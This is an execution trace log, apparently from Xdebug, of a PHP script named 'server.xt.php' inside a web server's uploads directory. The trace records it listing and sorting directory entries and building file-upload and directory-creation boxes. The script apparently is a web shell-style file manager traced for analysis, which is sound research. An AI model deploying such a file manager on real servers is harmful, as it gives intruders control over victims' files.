5	167	0	0.008453	800360	htmlentities	0		/var/www/html/uploads/server.xt.php	1599	3	'change'	2	'UTF-8'
5	167	1	0.008467	800632
5	167	R			'change'
4	166	1	0.008482	800520
4	166	R			'change'
3	159	1	0.008496	800040
3	168	0	0.008503	800040	is_writable	0		/var/www/html/uploads/server.xt.php	1205	1	'/var/www/html/uploads/'
3	168	1	0.008520	800080
3	168	R			TRUE
3	169	0	0.008533	800040	upload_box	1		/var/www/html/uploads/server.xt.php	1206	0
4	170	0	0.008546	800104	word	1		/var/www/html/uploads/server.xt.php	1452	1	'file'
5	171	0	0.008563	800104	htmlentities	0		/var/www/html/uploads/server.xt.php	1599	3	'File'	2	'UTF-8'
5	171	1	0.008577	800376
5	171	R			'File'
4	170	1	0.008591	800264
4	170	R			'File'
4	172	0	0.008604	800232	word	1		/var/www/html/uploads/server.xt.php	1454	1	'upload'
5	173	0	0.008617	800232	htmlentities	0		/var/www/html/uploads/server.xt.php	1599	3	'upload'	2	'UTF-8'
5	173	1	0.008632	800504
5	173	R			'upload'
4	172	1	0.008646	800392
4	172	R			'upload'
3	169	1	0.008659	800040
3	174	0	0.008666	800040	create_box	1		/var/www/html/uploads/server.xt.php	1207	0
4	175	0	0.008678	800200	word	1		/var/www/html/uploads/server.xt.php	1467	1	'file'
5	176	0	0.008691	800200	htmlentities	0		/var/www/html/uploads/server.xt.php	1599	3	'File'	2	'UTF-8'
5	176	1	0.008705	800472
5	176	R			'File'
4	175	1	0.008718	800360
4	175	R			'File'
4	177	0	0.008731	800264	word	1		/var/www/html/uploads/server.xt.php	1468	1	'directory'
5	178	0	0.008743	800264	htmlentities	0		/var/www/html/uploads/server.xt.php	1599	3	'Directory'	2	'UTF-8'
5	178	1	0.008758	800536
5	178	R			'Directory'
4	177	1	0.008772	800424
4	177	R			'Directory'
4	179	0	0.008785	800424	word	1		/var/www/html/uploads/server.xt.php	1471	1	'create'
5	180	0	0.008798	800424	htmlentities	0		/var/www/html/uploads/server.xt.php	1599	3	'create'	2	'UTF-8'
5	180	1	0.008812	800696
5	180	R			'create'
4	179	1	0.008825	800584
4	179	R			'create'
3	174	1	0.008839	800040
3	181	0	0.008846	800040	sortlist	1		/var/www/html/uploads/server.xt.php	1213	3	[0 => ['filename' => 'server.xt.php', 'path' => '/var/www/html/uploads/server.xt.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 77659, 'permission' => 33204, 'owner' => 1000, 'group' => 1000, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => FALSE, 'owner_name' => 'osboxes', 'group_name' => 'osboxes'], 1 => ['filename' => '..', 'path' => '/var/www/html/uploads/..', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676253116, 'atime' => 1676253116, 'ctime' => 1676253116, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 2 => ['filename' => '.', 'path' => '/var/www/html/uploads/.', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 3 => ['filename' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 57, 'permission' => 33261, 'owner' => 0, 'group' => 0, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 4 => ['filename' => 'data', 'path' => '/var/www/html/uploads/data', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 5 => ['filename' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 64, 'permission' => 33188, 'owner' => 0, 'group' => 0, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => FALSE, 'owner_name' => 'root', 'group_name' => 'root']]	'filename'	FALSE
3		A						/var/www/html/uploads/server.xt.php	907	$dirs = []
3		A						/var/www/html/uploads/server.xt.php	908	$files = []
3		A						/var/www/html/uploads/server.xt.php	910	$i = 0
4	182	0	0.008951	800040	sizeof	0		/var/www/html/uploads/server.xt.php	910	1	[0 => ['filename' => 'server.xt.php', 'path' => '/var/www/html/uploads/server.xt.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 77659, 'permission' => 33204, 'owner' => 1000, 'group' => 1000, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => FALSE, 'owner_name' => 'osboxes', 'group_name' => 'osboxes'], 1 => ['filename' => '..', 'path' => '/var/www/html/uploads/..', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676253116, 'atime' => 1676253116, 'ctime' => 1676253116, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 2 => ['filename' => '.', 'path' => '/var/www/html/uploads/.', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 3 => ['filename' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 57, 'permission' => 33261, 'owner' => 0, 'group' => 0, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 4 => ['filename' => 'data', 'path' => '/var/www/html/uploads/data', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 5 => ['filename' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 64, 'permission' => 33188, 'owner' => 0, 'group' => 0, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => FALSE, 'owner_name' => 'root', 'group_name' => 'root']]
4	182	1	0.009023	800072
4	182	R			6
3		A						/var/www/html/uploads/server.xt.php	912	$files[] = ['filename' => 'server.xt.php', 'path' => '/var/www/html/uploads/server.xt.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 77659, 'permission' => 33204, 'owner' => 1000, 'group' => 1000, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => FALSE, 'owner_name' => 'osboxes', 'group_name' => 'osboxes']
3		A						/var/www/html/uploads/server.xt.php	910	$i++
4	183	0	0.009076	800416	sizeof	0		/var/www/html/uploads/server.xt.php	910	1	[0 => ['filename' => 'server.xt.php', 'path' => '/var/www/html/uploads/server.xt.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 77659, 'permission' => 33204, 'owner' => 1000, 'group' => 1000, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => FALSE, 'owner_name' => 'osboxes', 'group_name' => 'osboxes'], 1 => ['filename' => '..', 'path' => '/var/www/html/uploads/..', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676253116, 'atime' => 1676253116, 'ctime' => 1676253116, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 2 => ['filename' => '.', 'path' => '/var/www/html/uploads/.', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 3 => ['filename' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 57, 'permission' => 33261, 'owner' => 0, 'group' => 0, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 4 => ['filename' => 'data', 'path' => '/var/www/html/uploads/data', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 5 => ['filename' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 64, 'permission' => 33188, 'owner' => 0, 'group' => 0, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => FALSE, 'owner_name' => 'root', 'group_name' => 'root']]
4	183	1	0.009213	800448
4	183	R			6
3		A						/var/www/html/uploads/server.xt.php	911	$dirs[] = ['filename' => '..', 'path' => '/var/www/html/uploads/..', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676253116, 'atime' => 1676253116, 'ctime' => 1676253116, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root']
3		A						/var/www/html/uploads/server.xt.php	910	$i++
4	184	0	0.009266	800792	sizeof	0		/var/www/html/uploads/server.xt.php	910	1	[0 => ['filename' => 'server.xt.php', 'path' => '/var/www/html/uploads/server.xt.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 77659, 'permission' => 33204, 'owner' => 1000, 'group' => 1000, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => FALSE, 'owner_name' => 'osboxes', 'group_name' => 'osboxes'], 1 => ['filename' => '..', 'path' => '/var/www/html/uploads/..', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676253116, 'atime' => 1676253116, 'ctime' => 1676253116, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 2 => ['filename' => '.', 'path' => '/var/www/html/uploads/.', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 3 => ['filename' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 57, 'permission' => 33261, 'owner' => 0, 'group' => 0, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 4 => ['filename' => 'data', 'path' => '/var/www/html/uploads/data', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 5 => ['filename' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 64, 'permission' => 33188, 'owner' => 0, 'group' => 0, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => FALSE, 'owner_name' => 'root', 'group_name' => 'root']]
4	184	1	0.009333	800824
4	184	R			6
3		A						/var/www/html/uploads/server.xt.php	911	$dirs[] = ['filename' => '.', 'path' => '/var/www/html/uploads/.', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root']
3		A						/var/www/html/uploads/server.xt.php	910	$i++
4	185	0	0.009389	800792	sizeof	0		/var/www/html/uploads/server.xt.php	910	1	[0 => ['filename' => 'server.xt.php', 'path' => '/var/www/html/uploads/server.xt.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 77659, 'permission' => 33204, 'owner' => 1000, 'group' => 1000, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => FALSE, 'owner_name' => 'osboxes', 'group_name' => 'osboxes'], 1 => ['filename' => '..', 'path' => '/var/www/html/uploads/..', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676253116, 'atime' => 1676253116, 'ctime' => 1676253116, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 2 => ['filename' => '.', 'path' => '/var/www/html/uploads/.', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 3 => ['filename' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 57, 'permission' => 33261, 'owner' => 0, 'group' => 0, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 4 => ['filename' => 'data', 'path' => '/var/www/html/uploads/data', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 5 => ['filename' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 64, 'permission' => 33188, 'owner' => 0, 'group' => 0, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => FALSE, 'owner_name' => 'root', 'group_name' => 'root']]
4	185	1	0.009455	800824
4	185	R			6
3		A						/var/www/html/uploads/server.xt.php	912	$files[] = ['filename' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 57, 'permission' => 33261, 'owner' => 0, 'group' => 0, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root']
3		A						/var/www/html/uploads/server.xt.php	910	$i++
4	186	0	0.009504	800792	sizeof	0		/var/www/html/uploads/server.xt.php	910	1	[0 => ['filename' => 'server.xt.php', 'path' => '/var/www/html/uploads/server.xt.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 77659, 'permission' => 33204, 'owner' => 1000, 'group' => 1000, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => FALSE, 'owner_name' => 'osboxes', 'group_name' => 'osboxes'], 1 => ['filename' => '..', 'path' => '/var/www/html/uploads/..', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676253116, 'atime' => 1676253116, 'ctime' => 1676253116, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 2 => ['filename' => '.', 'path' => '/var/www/html/uploads/.', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 3 => ['filename' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 57, 'permission' => 33261, 'owner' => 0, 'group' => 0, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 4 => ['filename' => 'data', 'path' => '/var/www/html/uploads/data', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 5 => ['filename' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 64, 'permission' => 33188, 'owner' => 0, 'group' => 0, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => FALSE, 'owner_name' => 'root', 'group_name' => 'root']]
4	186	1	0.009576	800824
4	186	R			6
3		A						/var/www/html/uploads/server.xt.php	911	$dirs[] = ['filename' => 'data', 'path' => '/var/www/html/uploads/data', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root']
3		A						/var/www/html/uploads/server.xt.php	910	$i++
4	187	0	0.009626	800792	sizeof	0		/var/www/html/uploads/server.xt.php	910	1	[0 => ['filename' => 'server.xt.php', 'path' => '/var/www/html/uploads/server.xt.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 77659, 'permission' => 33204, 'owner' => 1000, 'group' => 1000, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => FALSE, 'owner_name' => 'osboxes', 'group_name' => 'osboxes'], 1 => ['filename' => '..', 'path' => '/var/www/html/uploads/..', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676253116, 'atime' => 1676253116, 'ctime' => 1676253116, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 2 => ['filename' => '.', 'path' => '/var/www/html/uploads/.', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 3 => ['filename' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 57, 'permission' => 33261, 'owner' => 0, 'group' => 0, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 4 => ['filename' => 'data', 'path' => '/var/www/html/uploads/data', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 5 => ['filename' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 64, 'permission' => 33188, 'owner' => 0, 'group' => 0, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => FALSE, 'owner_name' => 'root', 'group_name' => 'root']]
4	187	1	0.009692	800824
4	187	R			6
3		A						/var/www/html/uploads/server.xt.php	912	$files[] = ['filename' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 64, 'permission' => 33188, 'owner' => 0, 'group' => 0, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => FALSE, 'owner_name' => 'root', 'group_name' => 'root']
3		A						/var/www/html/uploads/server.xt.php	910	$i++
4	188	0	0.009741	800792	sizeof	0		/var/www/html/uploads/server.xt.php	910	1	[0 => ['filename' => 'server.xt.php', 'path' => '/var/www/html/uploads/server.xt.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 77659, 'permission' => 33204, 'owner' => 1000, 'group' => 1000, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => FALSE, 'owner_name' => 'osboxes', 'group_name' => 'osboxes'], 1 => ['filename' => '..', 'path' => '/var/www/html/uploads/..', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676253116, 'atime' => 1676253116, 'ctime' => 1676253116, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 2 => ['filename' => '.', 'path' => '/var/www/html/uploads/.', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 3 => ['filename' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 57, 'permission' => 33261, 'owner' => 0, 'group' => 0, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 4 => ['filename' => 'data', 'path' => '/var/www/html/uploads/data', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 5 => ['filename' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 64, 'permission' => 33188, 'owner' => 0, 'group' => 0, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => FALSE, 'owner_name' => 'root', 'group_name' => 'root']]
4	188	1	0.009807	800824
4	188	R			6
4	189	0	0.009821	800816	sizeof	0		/var/www/html/uploads/server.xt.php	915	1	[0 => ['filename' => '..', 'path' => '/var/www/html/uploads/..', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676253116, 'atime' => 1676253116, 'ctime' => 1676253116, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 1 => ['filename' => '.', 'path' => '/var/www/html/uploads/.', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 2 => ['filename' => 'data', 'path' => '/var/www/html/uploads/data', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root']]
4	189	1	0.009865	800848
4	189	R			3
4	190	0	0.009879	800816	quicksort	1		/var/www/html/uploads/server.xt.php	915	4	[0 => ['filename' => '..', 'path' => '/var/www/html/uploads/..', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676253116, 'atime' => 1676253116, 'ctime' => 1676253116, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 1 => ['filename' => '.', 'path' => '/var/www/html/uploads/.', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 2 => ['filename' => 'data', 'path' => '/var/www/html/uploads/data', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root']]	0	2	'filename'
5	191	0	0.009925	800816	floor	0		/var/www/html/uploads/server.xt.php	929	1	1
5	191	1	0.009938	800848
5	191	R			1
4		A						/var/www/html/uploads/server.xt.php	929	$cmp = '.'
4		A						/var/www/html/uploads/server.xt.php	931	$l = 0
4		A						/var/www/html/uploads/server.xt.php	932	$r = 2
